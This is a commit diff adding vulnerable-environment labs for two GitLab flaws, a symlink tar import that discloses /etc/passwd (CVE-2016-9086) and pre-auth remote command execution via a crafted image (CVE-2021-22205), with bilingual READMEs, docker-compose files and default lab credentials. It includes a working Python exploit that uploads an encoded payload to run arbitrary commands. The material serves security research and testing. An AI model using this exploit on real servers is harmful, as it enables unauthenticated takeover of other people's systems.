first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/gitlab/CVE-2016-9086/1.png
+++ b/gitlab/CVE-2016-9086/1.png
--- a/gitlab/CVE-2016-9086/2.png
+++ b/gitlab/CVE-2016-9086/2.png
--- a/gitlab/CVE-2016-9086/README.md
+++ b/gitlab/CVE-2016-9086/README.md
@@ -0,0 +1,35 @@
+# GitLab Arbitrary File Disclosure (CVE-2016-9086)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GitLab is a web-based DevOps lifecycle tool that provides a Git repository manager providing wiki, issue-tracking and continuous integration and deployment pipeline features.
+
+Jobert Abma from HackerOne disclosed a critical security flaw in the "import/export project" feature of GitLab. Added in GitLab 8.9, this feature allows a user to export and then re-import their projects as tape archive files (tar). All GitLab versions prior to 8.13.0 restricted this feature to administrators only. Starting with version 8.13.0 this feature was made available to all users.
+
+This feature did not properly check for symbolic links in user-provided archives and therefore it was possible for an authenticated user to retrieve the contents of any file accessible to the GitLab service account. This included sensitive files such as those that contain secret tokens used by the GitLab service to authenticate users. Please see the issue for more details.
+
+References:
+
+- https://about.gitlab.com/releases/2016/11/02/cve-2016-9086-patches/
+- https://hackerone.com/reports/178152
+- http://paper.seebug.org/104/
+
+## Vulnerable environment
+
+Execute following command to start a GitLab Community Server 8.13.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the website, the credentials of default administrator account are `root` and `vulhub123456`.
+
+## Exploit
+
+Signup and signin an account, then click the "GitLab export" button on the project creation page:
+
+![](2.png)
+
+Uploaded the file [test.tar.gz](test.tar.gz), and the file `/etc/passwd` is disclosed:
+
+![](1.png)
--- a/gitlab/CVE-2016-9086/README.zh-cn.md
+++ b/gitlab/CVE-2016-9086/README.zh-cn.md
@@ -0,0 +1,31 @@
+# GitLab 任意文件读取漏洞（CVE-2016-9086）
+
+GitLab是一款Ruby开发的Git项目管理平台。在8.9版本后添加的“导出、导入项目”功能，因为没有处理好压缩包中的软连接，已登录用户可以利用这个功能读取服务器上的任意文件。
+
+参考链接：
+
+- https://about.gitlab.com/releases/2016/11/02/cve-2016-9086-patches/
+- https://hackerone.com/reports/178152
+- http://paper.seebug.org/104/
+
+## 测试环境
+
+执行如下命令启动一个GitLab Community Server 8.13.1：
+
+```
+docker compose up -d
+```
+
+环境运行后，访问`http://your-ip:8080`即可查看GitLab主页，其ssh端口为10022，默认管理员账号、密码是`root`、`vulhub123456`。
+
+> 注意，请使用2G及以上内存的VPS或虚拟机运行该环境，实测1G内存的机器无法正常运行GitLab（运行后502错误）。
+
+## 漏洞复现
+
+注册并登录用户，新建一个项目，点击`GitLab export`：
+
+![](2.png)
+
+在导入页面，将[test.tar.gz](test.tar.gz)上传，将会读取到`/etc/passwd`文件内容：
+
+![](1.png)
--- a/gitlab/CVE-2016-9086/docker-compose.yml
+++ b/gitlab/CVE-2016-9086/docker-compose.yml
@@ -0,0 +1,38 @@
+version: '2'
+
+services:
+  redis:
+    image: redis:4.0.14-alpine
+
+  postgresql:
+    image: postgres:11.9-alpine
+    environment:
+    - POSTGRES_USER=gitlab
+    - POSTGRES_PASSWORD=password
+    - POSTGRES_DB=gitlabhq_production
+    - DB_EXTENSION=pg_trgm
+    volumes:
+    - ./load-extensions.sh:/docker-entrypoint-initdb.d/load-extensions.sh
+
+  gitlab:
+    image: vulhub/gitlab:8.13.1
+    depends_on:
+    - redis
+    - postgresql
+    ports:
+    - "8080:80"
+    - "10022:22"
+    environment:
+    - DEBUG=false
+    - GITLAB_PORT=8080
+    - GITLAB_SSH_PORT=10022
+    - GITLAB_SECRETS_DB_KEY_BASE=secret-key-is-here1
+    - GITLAB_SECRETS_SECRET_KEY_BASE=secret-key-is-here2
+    - GITLAB_SECRETS_OTP_KEY_BASE=secret-key-is-here3
+    - DB_ADAPTER=postgresql
+    - DB_HOST=postgresql
+    - DB_USER=gitlab
+    - DB_PASS=password
+    - DB_NAME=gitlabhq_production
+    - REDIS_HOST=redis
+    - GITLAB_ROOT_PASSWORD=vulhub123456
--- a/gitlab/CVE-2016-9086/load-extensions.sh
+++ b/gitlab/CVE-2016-9086/load-extensions.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+# You could probably do this fancier and have an array of extensions
+# to create, but this is mostly an illustration of what can be done
+
+psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" --dbname "$POSTGRES_DB" <<EOF
+    create extension pg_trgm;
+    select * FROM pg_extension;
+EOF
--- a/gitlab/CVE-2016-9086/test.tar.gz
+++ b/gitlab/CVE-2016-9086/test.tar.gz
--- a/gitlab/CVE-2021-22205/1.png
+++ b/gitlab/CVE-2021-22205/1.png
--- a/gitlab/CVE-2021-22205/2.png
+++ b/gitlab/CVE-2021-22205/2.png
--- a/gitlab/CVE-2021-22205/README.md
+++ b/gitlab/CVE-2021-22205/README.md
@@ -0,0 +1,38 @@
+# GitLab Pre-Auth Remote Command Execution (CVE-2021-22205)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GitLab is a web-based DevOps lifecycle tool that provides a Git repository manager providing wiki, issue-tracking and continuous integration and deployment pipeline features.
+
+An issue has been discovered in GitLab CE/EE affecting the versions starting from 11.9. GitLab was not properly validating image files that is passed to a file parser which resulted in an unauthenticated remote command execution.
+
+References:
+
+- https://hackerone.com/reports/1154542
+- https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
+- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
+- https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml
+
+## Vulnerable environment
+
+Execute following command to start a GitLab Community Server 13.10.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the website.
+
+## Exploit
+
+The api endpoint `/uploads/user` is an unauthenticated interface. Attack the server through the [poc.py](poc.py):
+
+```
+python poc.py http://your-ip:8080 "touch /tmp/success"
+```
+
+![](1.png)
+
+`touch /tmp/success` has been executed successfully:
+
+![](2.png)
--- a/gitlab/CVE-2021-22205/README.zh-cn.md
+++ b/gitlab/CVE-2021-22205/README.zh-cn.md
@@ -0,0 +1,34 @@
+# GitLab 远程命令执行漏洞（CVE-2021-22205）
+
+GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中，因为使用了图片处理工具ExifTool而受到漏洞[CVE-2021-22204](https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响，攻击者可以通过一个未授权的接口上传一张恶意构造的图片，进而在GitLab服务器上执行任意命令。
+
+参考链接：
+
+- https://hackerone.com/reports/1154542
+- https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
+- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
+- https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml
+
+## 漏洞环境
+
+执行如下命令启动一个GitLab 13.10.1版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到GitLab的登录页面。
+
+## 漏洞复现
+
+GitLab的/uploads/user接口可以上传图片且无需认证，利用[poc.py](poc.py)脚本来测试这个漏洞：
+
+```
+python poc.py http://your-ip:8080 "touch /tmp/success"
+```
+
+![](1.png)
+
+进入容器内，可见`touch /tmp/success`已成功执行：
+
+![](2.png)
--- a/gitlab/CVE-2021-22205/docker-compose.yml
+++ b/gitlab/CVE-2021-22205/docker-compose.yml
@@ -0,0 +1,49 @@
+version: '2.3'
+
+services:
+  redis:
+    image: redis:5.0.9-alpine
+
+  postgresql:
+    image: postgres:12-alpine
+    environment:
+    - POSTGRES_USER=gitlab
+    - POSTGRES_PASSWORD=password
+    - POSTGRES_DB=gitlabhq_production
+    - DB_EXTENSION=pg_trgm,btree_gist
+
+  gitlab:
+    image: vulhub/gitlab:13.10.1
+    depends_on:
+    - redis
+    - postgresql
+    ports:
+    - "8080:80"
+    - "10022:22"
+    environment:
+    - DEBUG=false
+
+    - DB_ADAPTER=postgresql
+    - DB_HOST=postgresql
+    - DB_PORT=5432
+    - DB_USER=gitlab
+    - DB_PASS=password
+    - DB_NAME=gitlabhq_production
+
+    - REDIS_HOST=redis
+    - REDIS_PORT=6379
+
+    - GITLAB_HTTPS=false
+    - SSL_SELF_SIGNED=false
+
+    - GITLAB_HOST=localhost
+    - GITLAB_PORT=8080
+    - GITLAB_SSH_PORT=10022
+    - GITLAB_RELATIVE_URL_ROOT=
+    - GITLAB_SECRETS_DB_KEY_BASE=long-long-long-long-long-long-secret-key-is-here1
+    - GITLAB_SECRETS_SECRET_KEY_BASE=long-long-long-long-long-long-secret-key-is-here2
+    - GITLAB_SECRETS_OTP_KEY_BASE=long-long-long-long-long-long-secret-key-is-her3
+
+    - TZ=Asia/Kolkata
+    - GITLAB_TIMEZONE=Kolkata
+    - GITLAB_ROOT_PASSWORD=vulhub123456
--- a/gitlab/CVE-2021-22205/poc.py
+++ b/gitlab/CVE-2021-22205/poc.py
@@ -0,0 +1,36 @@
+import sys
+import re
+import requests
+
+
+target = sys.argv[1]
+command = sys.argv[2]
+session = requests.session()
+CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')
+
+def get_payload(command):
+    rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d'
+    rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True)
+    rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61'
+    rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True)
+    rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b'
+    rce_payload += command.encode()
+    rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
+    return rce_payload
+
+def csrf_token():
+    response = session.get(f'{target}/users/sign_in', headers={'Origin': target})
+    g = CSRF_PATTERN.search(response.content)
+    assert g, 'No CSRF Token found'
+
+    return g.group(1).decode()
+
+
+def exploit():
+    files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))]
+    session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()})
+
+
+if __name__ == '__main__':
+    exploit()
+    print('finish test')